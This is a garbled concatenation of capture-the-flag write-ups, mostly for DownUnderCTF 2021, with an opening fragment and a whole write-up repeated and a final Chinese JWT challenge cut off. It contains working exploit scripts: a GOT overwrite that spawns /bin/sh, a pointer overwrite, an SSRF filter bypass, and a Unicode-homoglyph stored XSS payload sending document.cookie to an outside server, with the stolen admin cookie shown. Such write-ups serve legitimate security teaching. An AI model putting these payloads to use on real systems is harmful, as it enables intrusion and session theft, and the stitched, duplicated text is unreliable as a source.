for i in range(len(key) + 1,16): s.sendline('a' * (16 - i)) base_block = re.findall('[A-Za-z0-9+\/=]{64}', s.recvuntil(":").decode('utf-8'))[0] print(base_block) for c in printable: s.sendline('a' * (16 - i) + key + c) block = re.findall('[A-Za-z0-9+\/=]{64}', s.recvuntil(":").decode('utf-8'))[0] if block == base_block: key = key + c print(key) break
s.close()
# Part 2 - Getting the flags = remote('pwn-2021.duc.tf', 31914)s.sendlineafter(':\n', ' ' * 16)ct = b64decode(s.recvuntil("\n").decode().strip())cipher = AES.new(key.encode(), AES.MODE_ECB)pt = cipher.decrypt(ct)print(pt)
```
**Flag**
**`DUCTF{ECB_M0DE_K3YP4D_D474_L34k}`**
## treasureYou and two friends have spent the past year playing an ARG that promises valuable treasures to the first team to find three secret shares scattered around the world. At long last, you have found all three and are ready to combine the shares to figure out where the treasure is. Of course, being the greedy individual you are, you plan to use your cryptography skills to deceive your friends into thinking that the treasure is in the middle of no where...
**Author:** joseph#8210
`nc pwn-2021.duc.tf 31901`
[treasure.py](challenges//treasure.py)
**Solution**
We can easily retrieve the secret by first sending 1 as our share, which means that the assumed secret is only the product of the other two shares raised to the power of two, and using our own share we can calculate the secret similarly to the way the combiner does that.
Using the secret and the fake_coords we will calculate the 3rd root of the division between them, and create a new share which is the product of the real share and the result, this will guarantee that the result of the combiner is `secret * fake_secret / secret = fake_secret` and so the result is the fake coordinates, and we can safely use our real coordinates, I wrote the following sage script to perform all of those calculation and interact with the server:```python
from Crypto.Util.number import long_to_bytesfrom pwn import *from gmpy2 import iroot
FAKE_COORDS = 5754622710042474278449745314387128858128432138153608237186776198754180710586599008803960884p = 13318541149847924181059947781626944578116183244453569385428199356433634355570023190293317369383937332224209312035684840187128538690152423242800697049469987K = GF(p)
s = remote('pwn-2021.duc.tf', 31901)share = int(s.recvline().split(b' ')[-1])s.sendlineafter(': ', '1')product = int(s.recvline().split(b' ')[-1])REAL_COORDS = pow(share, 3, p) * product % p
FAKE_DIV_REAL = K(FAKE_COORDS) / K(REAL_COORDS)FAKE_DIV_REAL_ROOT = FAKE_DIV_REAL.nth_root(3) new_share = share * FAKE_DIV_REAL_ROOT
s.sendlineafter(': ', str(new_share))s.sendlineafter(': ', str(REAL_COORDS))s.interactive()```
**Flag**
**`DUCTF{m4yb3_th3_r34L_tr34sur3_w4s_th3_fr13nDs_w3_m4d3_al0ng_Th3_W4y.......}`**
***
# Reversing
## no stringsThis binary contains a free flag. No strings attached, seriously!
**Author:** joseph#8210
[nostrings](challenges//nostrings)
**Solution**
With the challenge we're given an ELF binary file, running it prompt us to give the flag:
<div align="center"> </div>
So this is a flag checker, we can look at the disassembly to try and understand how it works, for disassembly in this challenge I used IDA free. The first thing that pops while looking at the disassemly is the main function:
<div align="center"> </div>
Even without looking at the instructions themselves we can figure out that it is looping over something, presumably our input, at further inspection we can see that is does just that while comparing each letter to a string it has in it's data section (annotated to make it more understandable):
<div align="center"> </div>
And we can get the full flag from the data section:
<div align="center"> </div>
The reason that strings don't normally will pick up this flag is because it is encoded with 16-bit where strings uses 7-bit (ASCII) by default, we can choose another encoding using the `-e` flag:
<div align="center"> </div>
**Flag**
**`DUCTF{stringent_strings_string}`** |
# Chanreaction**Category: Web**
The only thing available to do on this page was to create an account. Let's do that and log in:
The login page also had a link to a developer portal, let's check that out:
The site prevents us from accessing `/admin` ?.
Let's look at `/devchat` in the meanwhile. Here's a particularly interesting snippet of the chat:
Looks like there is a vulnerability where unicode is getting normalized *after* the check for malicious characters.
If you aren't familiar, unicode normalization is a process that can be used to determine if two different unicode strings should be seen as equal. Two unicode symbols are **canonically equivalent** if they should both be displayed the same way. And two symbols have **compatible equivalence** if they look different, but represent the same abstract character. More information on [unicode.org](https://unicode.org/reports/tr15/).
Next, we'll take a look at our profile page:
The note at the bottom is attention grabbing. If we can make an admin visit our page, perhaps we can use some XSS to steal their cookies?
First, we can do a test to see if the `<>` characters are usable for our attack:
```httpPOST /profile/5619 HTTP/2Host: web-chainreaction-a4b5ae3b.chal-2021.duc.tfCookie: session=.eJwlzjsOwjAMANC7ZGaI7TiJe5nK8UdlbemEuDtIvBO8d9nzjOso2-u841H2p5etWDiSLx1kwZSYwyBNCUNoqaH31kdIeOdISp2rBtbE1kgFbJAu1FadY4nYVETjWknnTJQBQeBg1Nlg8eQknNK4Wm1qQoaj_CL3Fed_wx2kfL7grjCG.YVG6ZQ.Qb_SzTdB-r2q-f6x8CN4tEF-m2Y
username=bobbytables&aboutme=<>```
I guess not. We'll have to get around this using some unicode.
Looking at the html response for an accepted payload (I tried `test`), we can see our value goes inside the `input` tag. We'll need to remember to break outside that tag before starting the payload:
```html<label for="aboutme" class="col-sm-2 form-label">About me</label><div class="col-sm-10"> <input type="text" name="aboutme" class="form-control" id="aboutme" value="test"></div>```
I used a [homoglyph attack generator](https://www.irongeek.com/homoglyph-attack-generator.php) to generate a test payload of `"><script>alert(1)</script>` that used normalized equivalent characters for the `<` and `>` symbols. I also used a different character for the `s` since their site also blocks the string `script`. This gives us: `"><Script>alert(1)</Script>`.
After url encoding:```httpPOST /profile/5619 HTTP/2Host: web-chainreaction-a4b5ae3b.chal-2021.duc.tfCookie: session=.eJwlzjsOwjAMANC7ZGaI7TiJe5nK8UdlbemEuDtIvBO8d9nzjOso2-u841H2p5etWDiSLx1kwZSYwyBNCUNoqaH31kdIeOdISp2rBtbE1kgFbJAu1FadY4nYVETjWknnTJQBQeBg1Nlg8eQknNK4Wm1qQoaj_CL3Fed_wx2kfL7grjCG.YVG6ZQ.Qb_SzTdB-r2q-f6x8CN4tEF-m2Y
username=bobbytables&aboutme=%22%EF%BC%9E%EF%BC%9C%EF%BC%B3cript%EF%BC%9Ealert(1)%EF%BC%9C/%EF%BC%B3cript%EF%BC%9E```
Now, the page renders like:```html<label for="aboutme" class="col-sm-2 form-label">About me</label><div class="col-sm-10"> <input type="text" name="aboutme" class="form-control" id="aboutme" value=""><Script>alert(1)</Script>"></div>```Notice how our unicode symbols were not stripped out by the filter, and that their server has normalized them into the regular symbols that the browser will read as instructions.
Now we get the popup when going to our profile:
Now we can try again with a payload to steal the admin cookies:
`"><Script>var i = new Image;i.src="https://[my-server-url]?"+document.cookie</Script>`
Request:
```httpPOST /profile/5619 HTTP/2Host: web-chainreaction-a4b5ae3b.chal-2021.duc.tfCookie: session=.eJwlzjsOwjAMANC7ZGaI7TiJe5nK8UdlbemEuDtIvBO8d9nzjOso2-u841H2p5etWDiSLx1kwZSYwyBNCUNoqaH31kdIeOdISp2rBtbE1kgFbJAu1FadY4nYVETjWknnTJQBQeBg1Nlg8eQknNK4Wm1qQoaj_CL3Fed_wx2kfL7grjCG.YVG6ZQ.Qb_SzTdB-r2q-f6x8CN4tEF-m2Y
username=bobbytables&aboutme=%22%EF%BC%9E%EF%BC%9C%EF%BC%B3cript%EF%BC%9Evar%20i%20=%20new%20Image;i.src=%22https://[my-server-url]?%22%2bdocument.cookie%EF%BC%9C/%EF%BC%B3cript%EF%BC%9E```
After clicking the report button, the admin visited my profile, and my server received the following request:
```GET /?admin-cookie=sup3rs3cur34dm1nc00k13```
Now we can set this cookie in our browser, and try going to the admin page again:
`DUCTF{_un1c0de_bypass_x55_ftw!}` |
# write what where

Check the ELF

Let reverse it

The challenge is really insteresting. They allow us to write 4 byte on some address we can choose, but we can only write one time.
Checking the ELF, we find that the PIE is not turn on. Mean that we all address in ELF file include function address, plt address, got address will be fixed. And RELRO is Partial RELRO, so we can write to the GOT table.
If you don't know anything about GOT, you can search google Global offset tabble. I will summarize it as follows. When the program is dynamically compiled. It does not include the entire source code of the library functions. (Example scanf, gets, printf, puts, exit, ...) but generates the function plt (produce link table). Plt function is responsible for jumping to the value set at a certain position in the GOT. When the program runs, the operating system places the actual addresses of libc (plus the libc base via the aslr mechanism) into the GOT table so that the PLT function can jump to and execute code.
So with the GOT, we can: leak the libc or change the value point to another place to change the flow of the program.
One important thing you have to know that is GOT tabble is not fill when program starting, it fill when the funtion call the first time by the program. Before it, it point to ELF code with call a special function to find that address in libc. I mention here for ease of explanation later.
## So how we use it to get the shell?
First thing we need to do, of courcse, is change the exit GOT to another function, to prevent the program to exit. In this program, I change exit back to main, because we didn’t know anything about libc base, so we cannot use one gadget. I can change it to main because the exit function didn’t call in program before, so the value in GOT table now point to code to call special function I mentioned above. It really importtant because you can write only 4 byte, not 8 byte. And if the address alreaydy loaded before you change, it will have 2 high byte and it will cause segment fault.
After change the exit GOT to main, we have the infinity loop of main function. So we can overwrite as many times as we want.
My direction in this chall is to change atoi function to system, then put the string "/bin/sh" into the nptr variable, then when calling atoi("/bin/sh"), the program will do system(" /bin/sh")
Because the GOT already have the real address of function in libc, if we want to change to another function at libc, we don’t need to leak hole libc address, just overwrite 2 or 3 last byte of the address.
Checking the libc they gave, I found one thing

The offset of atoi and system is different only 2 last byte, since 1.5 last byte alwayls fixed. So the success rate is 1/16 per attemp. For example, if libcbase is 0x7ffff7dc2000 then the real address is
```System: 0x7ffff7dc2000 + 0x4fa60 = 0x7ffff7e11a60Atoi: 0x7ffff7dc2000 + 0x421f0 = 0x7ffff7e041f0```
You can see it only different in 2 last byte, but 1.5 last byte of aslr base always 0, so we just only have 0.5 byte random. We will bypass this by bruteforce 1 value until it correct. It special because both offset have 0x40000 prefix, so we don’t need to change the 3th last byte in the real address. If you want to change atoi to some function have offset 0x50000. You will have 1.5 byte random and the sucessrate is 1/4096 per attemp.
## Final payload
- First, we change the exit GOT to main to recall the main function
- Secone, we change 2 last byte of Atoi function to system function
- Final, we put the “/bin/sh” to the nptr and call system(“/bin/sh”) to get a shell
File [solve.py](/2021/DownUnderCTF2021/write_what_where/solve.py)
```pythonfrom pwn import *s = remote('pwn-2021.duc.tf', 31920)#s = process('./write-what-where')#raw_input('DEBUG')system = 0xfa600000main = 0x4011a9exit_plt = 0x000000404038atoi_plt = 0x000000404030s.sendafter(b'what?\n', p32(main))payload = bytes(str(exit_plt), 'utf-8')s.sendlineafter(b'where?\n', b'0' * (8 - len(payload)) + payload)s.sendafter(b'what?\n', p32(system))payload = bytes(str(atoi_plt - 2), 'utf-8')s.sendlineafter(b'where?\n', b'0' * (8 - len(payload)) + payload)s.sendafter(b'what?\n', b'A')s.sendlineafter(b'where?\n', b'/bin/sh\x00')s.interactive()```
It not always work, but I you lucky (1/16), You will get the shell
`Flag: DUCTF{arb1tr4ry_wr1t3_1s_str0ng_www}`
|
**Author's Solve**
The way the challenge worked is by having people guess what order are the 256 bases chosen. The bases were `x` and `+`. The way that people could do it was by iteratively guessing what were the chosen bases and making sure that the server says that there are no errors. After getting all the right bases, the server sends the bits in polar co-ordinate form. Using the bases, we convert the polar co-ordinates into `1`s and `0`s. We translate the bits into ASCII and we get the message. Sending the message to the server gives us the flag.
For the entire script implementation, please check out `solution.py`. |
# **DownUnderCTF 2021**
<div align="center"> </div>
***
# Table of Contents* [Miscellaneous](#miscellaneous) * [Discord](#discord) * [The Introduction](#the-introduction) * [Twitter](#twitter) * [General Skills Quiz](#general-skills-quiz) * [rabbit](#rabbit) * [Floormat](#floormat)* [Cryptography](#cryptography) * [Substitution Cipher I](#substitution-cipher-i) * [Substitution Cipher II](#substitution-cipher-ii) * [Break Me!](#break-me) * [treasure](#treasure)* [Reversing](#reversing) * [no strings](#no-strings)***
# Miscellaneous
## DiscordHow about you visit our help page? You know what they say when you need 'help' discord is there for support :)
**Author:** Crem
**Solution**
The flag is in the `#request-support` channel on the [CTF discord channel](https://discord.gg/vXtuGXy)
**Flag**
**`DUCTF{if_you_are_having_challenge_issues_come_here_pls}`**
## The IntroductionAre you ready to start your journey?
**Author:** Crem
`nc pwn-2021.duc.tf 31906`
**Solution**
With the challenge we're given a command to run, this command (`nc`) connects to a server identified with the domain pwn-2021.duc.tf and interacts with a service running on port `31906`, running it returns the following question from the server:
```wh47 15 y0ur n4m3 h4ck3r?```
Entering a name will starts printing the hacker manifesto, this is an essay written in the 80s by "The Mentor" after his arrest and is considered a major piece of the hacker culture, the full essay is linked below and worth a read if you consider yourself part of the hacking community.
After printing the essay, the following line is written:```50 4r3 y0u 4c7u4lly 4 h4ck3r?```Answering yes will return you the flag (other answers might also work as I didn't check):
```W3rni0, y0u w1ll n33d 7h15 0n y0ur duc7f j0urn3y 7h3n
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
DUCTF{w3lc0m3_70_7h3_duc7f_7hund3rd0m3_h4ck3r}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
__ / \--..____ \ \ \-----,,,.. \ \ \ \--,,.. \ \ \ \ ,' \ \ \ \ ``.. \ \ \ \-'' \ \ \__,,--''' \ \ \. \ \ ,/ \ \__..- \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \```
**Flag** **`DUCTF{w3lc0m3_70_7h3_duc7f_7hund3rd0m3_h4ck3r}`**
**Refereces**
* [The Hacker Manifesto](http://phrack.org/issues/7/3.html)
## TwitterIf you have been paying attention to our Twitter, we have been using flags in the background of our graphics this year. However, one of these flags stands out a bit more than the rest! Can you find it?
While you're there, why don't you give us a follow to keep up to date with DownUnderCTF!
**Author:** Crem
**Solution**
This one is pretty guessy but the solution is written in the description so I guess I can't complain, this year the CTF graphics used flags from the previous competition, as can be seen here:
<div align="center"> </div>
But one of the graphics posted two weeks before the competition included the flag in a brighter color, try finding it in the image:
<div align="center"> </div>
(hint - look down)
**Flag**
**`DUCTF{EYES_ON_THE_PRIZES}`**
## General Skills QuizQUIZ TIME! Just answer the questions. Pretty easy right?
**Author:** Crem
`nc pwn-2021.duc.tf 31905`
**Solution**
This challenge requires you to decode and encode using different popular formats such as base64, binary and ROT13. Not enough time is given to do those manually, so I ended up writing the following python script that interacts with the server and performs the conversions (the tasks required are commented):```pythonfrom pwn import *from urllib.parse import unquotefrom base64 import b64decode, b64encodefrom codecs import encode,decode
s = remote('pwn-2021.duc.tf', 31905)
# Ready to starts.sendline()# 1+1=?s.recvuntil(': ')s.sendline('2')# Decode an hex string to decimals.recvuntil(': ')s.sendline(str(int(s.recvline(),16)))# Decode an hex string to ASCII letters.recvuntil(': ')s.sendline(str(chr(int(s.recvline(),16))))# Decode a URL encoded strings.recvuntil(': ')s.sendline(unquote(s.recvline(keepends=False).decode()))# Base64 decodes.recvuntil(': ')s.sendline(b64decode(s.recvline()))# Base64 encodes.recvuntil(': ')s.sendline(b64encode(s.recvline(keepends=False)))# ROT13 decodes.recvuntil(': ')s.sendline(decode(s.recvline(keepends=False).decode(), 'rot_13'))# ROT13 encodes.recvuntil(': ')s.sendline(encode(s.recvline(keepends=False).decode(), 'rot_13'))# Binary decodes.recvuntil(': ')s.sendline(str(int(s.recvline(),2)))# Binary encodes.recvuntil(': ')s.sendline(bin(int(s.recvline())))# Best CTF competitions.recvuntil('?')# s.sendline('picoCTF')s.sendline('DUCTF')s.interactive()```I'll add a description for each encoding used later on, after doing all those tasks we're given the flag:```Bloody Ripper! Here is the grand prize!
.^. (( )) |#|_______________________________ |#||##############################| |#||##############################| |#||##############################| |#||##############################| |#||########DOWNUNDERCTF##########| |#||########(DUCTF 2021)##########| |#||##############################| |#||##############################| |#||##############################| |#||##############################| |#|'------------------------------' |#| |#| |#| |#| |#| |#| |#| |#| |#| |#| |#| |#| DUCTF{you_aced_the_quiz!_have_a_gold_star_champion} |#| |#| |#| //|\\```**Flag**
**`DUCTF{you_aced_the_quiz!_have_a_gold_star_champion}`**
## rabbitCan you find Babushka's missing vodka? It's buried pretty deep, like 1000 steps, deep.
**Author:** Crem + z3kxTa
[flag.txt](challenges//flag.txt)
**Solution**
This type of challenge is really common and I've covered a variation of it before in [my writeup for TJCTF 2020](https://github.com/W3rni0/TJCTF_2020#zipped-up).
With the challenge we're given a file falsely named `flag.txt`, this file is actually a compressed file of either `bzip2`, `zip`, `gzip` or `xz` format. And, as the description for the challenge suggests, it contains another compressed file of the same type and so on. decompressing each file manually is possible but will require a lot of work, so we can automate the process by scripting.
For that I wrote the following bash script that for each file in the working directory checks its type, and if it of one of the above compression file formats, the script extract the content of the file and removes it. This process terminates only when there aren't any compressed files in the directory:
```bash#!/bin/bashget_flag() { for filename in $(pwd)/*; do echo "$filename" if [[ $(file --mime-type -b "$filename") == "application/x-bzip2" ]] then bunzip2 "$filename" rm "$filename" get_flag return elif [[ $(file --mime-type -b "$filename") == "application/zip" ]] then mv $filename flag.zip unzip flag.zip rm flag.zip get_flag return elif [[ $(file --mime-type -b "$filename") == "application/x-xz" ]] then mv $filename flag.xz unxz -f flag.xz rm flag.xz get_flag return elif [[ $(file --mime-type -b "$filename") == "application/gzip" ]] then mv $filename flag.gz gunzip flag.gz rm flag.gz get_flag return else cat "$filename" return fi done}
get_flag```
And by letting the script run for a while I got a text file containing the following string:```RFVDVEZ7YmFidXNoa2FzX3YwZGthX3dhc19oM3IzfQ==```I inferred by the symbols in the string that this is a base64 encoded message, and decoding it from base64 using [CyberChef](https://gchq.github.io/CyberChef/) I got the flag:
<div align="center"> </div>
**Flag**
**`DUCTF{babushkas_v0dka_was_h3r3}`**
## FloormatI've opened a new store that provides free furnishings and floormats. If you know the secret format we might also be able to give you flags...
**Author:** todo#7331
`nc pwn-2021.duc.tf 31903`
[floormat.py](challenges//floormat.py)
**Solution**
The function str.format() is used to replace a string we control with an object, which gives us access to object's attributes, one of them is a dictionary of global variables in the init of the object, which contains the flag:```pythonfrom pwn import *
s = remote('pwn-2021.duc.tf', 31903)# Ask for a custom formats.sendline("my l33t format")# Send Payloads.sendline("{f.__init__.__globals__[FLAG]}")s.sendline("F")# Ask for one of the furnishing (not important which)s.sendline("flutter")s.interactive()```**Flag**
**`DUCTF{fenomenal_flags_from_funky_formats_ffffff}`**
***
# Cryptography
## Substitution Cipher IJust a simple substitution cipher to get started...
**Author:** joseph#8210
[substitution-cipher-i.sage](challenges//substitution-cipher-i.sage) | [output.txt](challenges//output_i.txt)
**Solution**
The encryption is known and works letter by letter, thus we can find the encryption of each letter and use that to inverse the ciphertext:```pythonfrom string import printable
def encrypt(msg, f): return [chr(f.substitute(c)) for c in msg]
def decrypt(enc, f): subtitution_table = encrypt(printable.encode('utf-8'), f) return ''.join(printable[subtitution_table.index(c)] for c in enc)
P.<x> = PolynomialRing(ZZ)f = 13*x^2 + 3*x + 7
enc = open('./output.txt', 'r').read().strip()FLAG = decrypt(enc, f)print(FLAG)```**Flag**
**`DUCTF{sh0uld'v3_us3d_r0t_13}`**
## Substitution Cipher IIThat's an interesting looking substitution cipher...
**Author:** joseph#8210
[substitution-cipher-ii.sage](challenges//substitution-cipher-ii.sage) | [output.txt](challenges//output_ii.txt)
**Solution**
Similar to the previous challenge, only difference is that we need to find the polynomial now, we can do that by knowing that the flag starts with '`DUCTF{`' and ends with '`}`', and use lagrange interpolation to find the polynomial:
```pythonfrom string import ascii_lowercase, digits, printableCHARSET = "DUCTF{}_!?'" + ascii_lowercase + digitsn = len(CHARSET)
def encrypt(msg, f): ct = '' for c in msg: ct += CHARSET[f.substitute(CHARSET.index(c))] return ct
def decrypt(enc, f): subtitution_table = encrypt(CHARSET, f) return ''.join(CHARSET[subtitution_table.index(c)] for c in enc)
P.<x> = PolynomialRing(GF(n))enc = open('./output.txt', 'r').read().strip()
X = [0, 1, 2, 3, 4, 5, 6]Y = [CHARSET.index(c) for c in enc[:6]] + [CHARSET.index(enc[-1])]points = zip(X,Y)f = P.lagrange_polynomial(points)
FLAG = decrypt(enc,f)print(FLAG)```**Flag**
**`DUCTF{go0d_0l'_l4gr4fg3}`**
## Break Me!AES encryption challenge.
**Author:** 2keebs
`nc pwn-2021.duc.tf 31914`
[aes-ecb.py](challenges//aes-ecb.py)
**Solution**
AES-ECB one byte at a time attack, I covered it before in my writeup for [H@cktivityCon CTF 2020](https://github.com/W3rni0/HacktivityCon_CTF_2020#a-e-s-t-h-e-t-i-c):
```pythonfrom pwn import *import refrom string import printablefrom Crypto.Cipher import AESfrom base64 import b64decode
# Part 1 - Retrieving the keys = remote('pwn-2021.duc.tf', 31914)s.recvuntil(":")key = '' # !_SECRETSOURCE_!
for i in range(len(key) + 1,16): s.sendline('a' * (16 - i)) base_block = re.findall('[A-Za-z0-9+\/=]{64}', s.recvuntil(":").decode('utf-8'))[0] print(base_block) for c in printable: s.sendline('a' * (16 - i) + key + c) block = re.findall('[A-Za-z0-9+\/=]{64}', s.recvuntil(":").decode('utf-8'))[0] if block == base_block: key = key + c print(key) break
s.close()
# Part 2 - Getting the flags = remote('pwn-2021.duc.tf', 31914)s.sendlineafter(':\n', ' ' * 16)ct = b64decode(s.recvuntil("\n").decode().strip())cipher = AES.new(key.encode(), AES.MODE_ECB)pt = cipher.decrypt(ct)print(pt)
```
**Flag**
**`DUCTF{ECB_M0DE_K3YP4D_D474_L34k}`**
## treasureYou and two friends have spent the past year playing an ARG that promises valuable treasures to the first team to find three secret shares scattered around the world. At long last, you have found all three and are ready to combine the shares to figure out where the treasure is. Of course, being the greedy individual you are, you plan to use your cryptography skills to deceive your friends into thinking that the treasure is in the middle of no where...
**Author:** joseph#8210
`nc pwn-2021.duc.tf 31901`
[treasure.py](challenges//treasure.py)
**Solution**
We can easily retrieve the secret by first sending 1 as our share, which means that the assumed secret is only the product of the other two shares raised to the power of two, and using our own share we can calculate the secret similarly to the way the combiner does that.
Using the secret and the fake_coords we will calculate the 3rd root of the division between them, and create a new share which is the product of the real share and the result, this will guarantee that the result of the combiner is `secret * fake_secret / secret = fake_secret` and so the result is the fake coordinates, and we can safely use our real coordinates, I wrote the following sage script to perform all of those calculation and interact with the server:```python
from Crypto.Util.number import long_to_bytesfrom pwn import *from gmpy2 import iroot
FAKE_COORDS = 5754622710042474278449745314387128858128432138153608237186776198754180710586599008803960884p = 13318541149847924181059947781626944578116183244453569385428199356433634355570023190293317369383937332224209312035684840187128538690152423242800697049469987K = GF(p)
s = remote('pwn-2021.duc.tf', 31901)share = int(s.recvline().split(b' ')[-1])s.sendlineafter(': ', '1')product = int(s.recvline().split(b' ')[-1])REAL_COORDS = pow(share, 3, p) * product % p
FAKE_DIV_REAL = K(FAKE_COORDS) / K(REAL_COORDS)FAKE_DIV_REAL_ROOT = FAKE_DIV_REAL.nth_root(3) new_share = share * FAKE_DIV_REAL_ROOT
s.sendlineafter(': ', str(new_share))s.sendlineafter(': ', str(REAL_COORDS))s.interactive()```
**Flag**
**`DUCTF{m4yb3_th3_r34L_tr34sur3_w4s_th3_fr13nDs_w3_m4d3_al0ng_Th3_W4y.......}`**
***
# Reversing
## no stringsThis binary contains a free flag. No strings attached, seriously!
**Author:** joseph#8210
[nostrings](challenges//nostrings)
**Solution**
With the challenge we're given an ELF binary file, running it prompt us to give the flag:
<div align="center"> </div>
So this is a flag checker, we can look at the disassembly to try and understand how it works, for disassembly in this challenge I used IDA free. The first thing that pops while looking at the disassemly is the main function:
<div align="center"> </div>
Even without looking at the instructions themselves we can figure out that it is looping over something, presumably our input, at further inspection we can see that is does just that while comparing each letter to a string it has in it's data section (annotated to make it more understandable):
<div align="center"> </div>
And we can get the full flag from the data section:
<div align="center"> </div>
The reason that strings don't normally will pick up this flag is because it is encoded with 16-bit where strings uses 7-bit (ASCII) by default, we can choose another encoding using the `-e` flag:
<div align="center"> </div>
**Flag**
**`DUCTF{stringent_strings_string}`** |
# Inside-Out

# VulnerabilitySo, first of all, i was just playing around to find interesting about challenge. And i found two interesting.

the first one is (/admin) part. when I go to it, it was Forbidden by saying that "Only accessible from the local network".

The second thing that i found is (proxy-service). This proxy will show all the info and response about website that we want to get. Cool!

We can see there is a 'request' parameter that we can change the url which we want to go.
So, i am sured that this is SSRF vulnerability. Let pwn this!
# Solution
So i tested by (http://localhost/admin). but it was blacklist.
So i find the resources to bypass it, and i found blog post form HackTricks. (https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery)

So i found (http://0.0.0.0/admin) to bypass this blacklist. So i used it and got flag.

# flagDUCTF{very_spooky_request} |
The binary is relatively simple with 4 options. The 2 obvious options are `1. Set Username` and `2. Print Username`. If you put the binary in Ghirda, you'll find some other options too:

Basically, if you type in `1337`, you'll play a "game".
If you play the game normally, the binary will read 4 bytes from `/dev/random` and make you compare against it. Obviously, we can't guess this number with any reliability (that's 0 to 4,294,967,295).
In the beginning of the binary, it asks for your name and stores your name in a location right before the `/dev/random` string pointer:
```pwndbg> x/32xg &NAME0x5555555580a0 <NAME>: 0x20454d414e20594d 0x000a424f422053490x5555555580b0 <NAME+16>: 0x0000000000000000 0x00000000000000000x5555555580c0 <RANDBUF>: 0x0000555555556024 0x00000000000000000x5555555580d0: 0x0000000000000000 0x00000000000000000x5555555580e0: 0x0000000000000000 0x000000000000000...```
`NAME` is 32 bytes long.
You can also change your name. The binary checks how many characters to read from stdin by running `strlen` against the current `NAME`.
Using this information, you can create a `NAME` that's 32 bytes long and when you change your name, it will read into `RANDBUF` and instead of getting 32 bytes, it can get up to 38 bytes, overwriting `RANDBUF`.
Since PIE is enabled, we can't simply change `RANDBUF` to point to a user supplied string, unfortunately.
However, we can look for all other strings around `RANDBUF`:
```pwndbg> x/16s 0x00005555555560240x555555556024: "/dev/urandom"0x555555556031: "Invalid choice."0x555555556041: "1. Set Username"0x555555556051: "2. Print Username"0x555555556063: "> "0x555555556066: ""0x555555556067: ""0x555555556068: "What would you like to change your username to?"0x555555556098: "rb"0x55555555609b: "guess: "0x5555555560a3: "/bin/sh"0x5555555560ab: ""0x5555555560ac: "\001\033\003;`"0x5555555560b2: ""0x5555555560b3: ""0x5555555560b4: "\v"```
The only string here that's a "file" that is valid to read from is actually `/bin/sh`.
We can change the 1 last byte from the `RANDBUF` pointer from `24` to `a3` and `RANDBUF` will then point to `/bin/sh` (which has a known first 4 bytes).
This is a one-byte-overwrite.
This solution is alright but it's not reliable. The reason why is because `strlen` will usually return 38 bytes and then `fread()` will ask for 38 bytes exactly. It won't read less. Therefore, the only time this will work is if `strlen` returns 33 bytes (32 bytes for the `NAME` + 1 byte overwrite). This only happens if by chance the 2nd to last byte of `RANDBUF` is `NULL` or `0x00`. The last hex will always be `0x0` but the first hex ranges from `0x0` to `0xF`. This is a 1/16 chance of happening. Despite this, it will work.
Once you get lucky and hit the 1/16 chance, you can run the game with option `1337`. The first 4 bytes of `/bin/sh` in integer format is `1179403647`. Then you get a win:

Script (I ran it against the CTF server like 20 times before getting a win):
```python3#!/usr/bin/env python3# -*- coding: utf-8 -*-# This exploit template was generated via:# $ pwn template babygamefrom pwn import *
# Set up pwntools for the correct architectureexe = context.binary = ELF('babygame')
# Many built-in settings can be controlled on the command-line and show up# in "args". For example, to dump all data sent/received, and disable ASLR# for all created processes...# ./exploit.py DEBUG NOASLR
def start(argv=[], *a, **kw): '''Start the exploit against the target.''' if args.GDB: return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) else: return process([exe.path] + argv, *a, **kw)
# Specify your GDB script here for debugging# GDB will be launched if the exploit is run via e.g.# ./exploit.py GDBgdbscript = '''tbreak mainbreak gamecontinue'''.format(**locals())
#===========================================================# EXPLOIT GOES HERE#===========================================================# Arch: amd64-64-little# RELRO: Partial RELRO# Stack: Canary found# NX: NX enabled# PIE: PIE enabled
io = start()
def play_game(guess): io.sendlineafter(">", b"1337") io.sendlineafter("guess: ", guess)
def change_user(new_user): io.sendlineafter(">", b"1") io.sendafter("change your username to?", new_user) io.recvuntil("1.")
io.sendafter("what is your name?", cyclic(0x20))new_user = fit({0x0: b"/dev/zero\x0a", 0x20: b"\xa3"})change_user(new_user)
# Works 1/16 chance. Requires the 2nd to last byte of RAND to be a null byteplay_game(str(1179403647))
io.interactive()``` |
**Author's Solve**
After connecting to the server, people are given morse code. Decoding it leads them to numbers which are the decimal ASCII representation of letters and numbers.
Converting the decimal numbers to ASCII, they see that there are capital letters, lowercase letters, numbers and the equal to sign. This is base64 and they need to decode it.
After decoding the Base64 text, they will get text that is in the format of "N = some number, e = 3, c = some number". This is RSA encryption and the flaw that they had to realize was that the public exponent was super small and the ciphertext was short. This implies that the ciphertext can be recoved by just taking the cube root of the ciphertext.
After taking the cube root and converting the number to bytes to ASCII, they are greeted some random text. As a hint, the theme was Pokemon and the first ciphertext was a fixed string "Pokemon Names". Becasue of that, people can recognize that the last stage of decryption needs them to apply a Caeser shift of 13.
This needs to be done for 6 different ciphertexts and after decrypting them and sending it to the server, people would get the flag from the server.
For the script implementation, please check out solver.sage. The reason that SageMath was used is because standard Python was having precision issues for taking the cube root. |
# The Devil Never Sleeps
*If you put the devil to sleep, you will get the flag successfully. Unfortunately, the devil never sleeps. But what if you use some sleeping pills?*
*[http://194.5.207.57:8080](http://194.5.207.57:8080/)*
---
访问题目链接
```To get sleeping pills, navigate to /sleepingpill. To get the flag, navigate to /flag.```
访问`/sleepingpill`得到`JWT`和`Public Key`,保存至`pub.key`
```ASN.1-----BEGIN PUBLIC KEY-----MIGsMA0GCSqGSIb3DQEBAQUAA4GaADCBlgKBjgD//////////////////////////////////////////////////////////////////////////////////////3/////////////+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAECAwEAAQ==-----END PUBLIC KEY-----```
访问`/flag`
```json{ "msg": "Missing Pill Header"}```
加上`Pill`试试,可以看到是一个标准的`JWT`格式
```json{ "msg": "Missing 'Bearer' type in 'Pill' header. Expected 'Pill: Bearer <JWT>'"}```
在[jwt.io](https://jwt.io/)上解析一下`JWT`

使用[RsaCtfTool](https://github.com/Ganapati/RsaCtfTool)生成私钥,保存至`private.pem`
```shellpython RsaCtfTool.py --publickey ./key.pub --private```
